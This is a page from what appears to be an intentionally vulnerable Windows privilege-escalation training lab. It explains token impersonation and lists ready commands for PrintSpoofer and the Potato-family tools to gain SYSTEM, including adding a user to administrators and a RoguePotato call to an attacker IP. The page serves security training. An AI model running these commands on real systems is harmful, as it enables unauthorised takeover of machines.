🪟 Windows Privilege Escalation Lab

PRACIVO LAB — INTENTIONALLY VULNERABLE
Home Login Unquoted Paths AlwaysInstallElevated Weak Service Perms Token Impersonation DLL Hijacking Stored Credentials
⚠️ Pracivo Security Lab — Windows privilege escalation techniques. Start as low-privilege user, escalate to SYSTEM or Administrator.
Lab Credentials: ram / pracivo  |  alice / alice123  |  administrator / Admin@2024 (goal: escalate to this)

Token Impersonation — PrintSpoofer & Potato Attacks

PRIVILEGE ESCALATION 
# If you have SeImpersonatePrivilege (common for IIS, SQL Server service accounts),
# you can impersonate SYSTEM using Potato-family attacks.

# Check your privileges:
whoami /priv
# Look for: SeImpersonatePrivilege  Enabled
#           SeAssignPrimaryTokenPrivilege  Enabled

# Method 1: PrintSpoofer (Windows 10/Server 2016+)
PrintSpoofer.exe -i -c cmd
# -i = interactive shell, -c = command to run as SYSTEM

# Method 2: GodPotato (works on Windows Server 2012-2022)
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "cmd /c net localgroup administrators ram /add"

# Method 3: JuicyPotato (older, requires CLSID for OS version)
JuicyPotato.exe -l 1337 -p cmd.exe -t * -c "{CLSID}"

# Method 4: RoguePotato
RoguePotato.exe -r YOUR_IP -e "cmd.exe" -l 9999

# After escalation:
whoami
# nt authority\system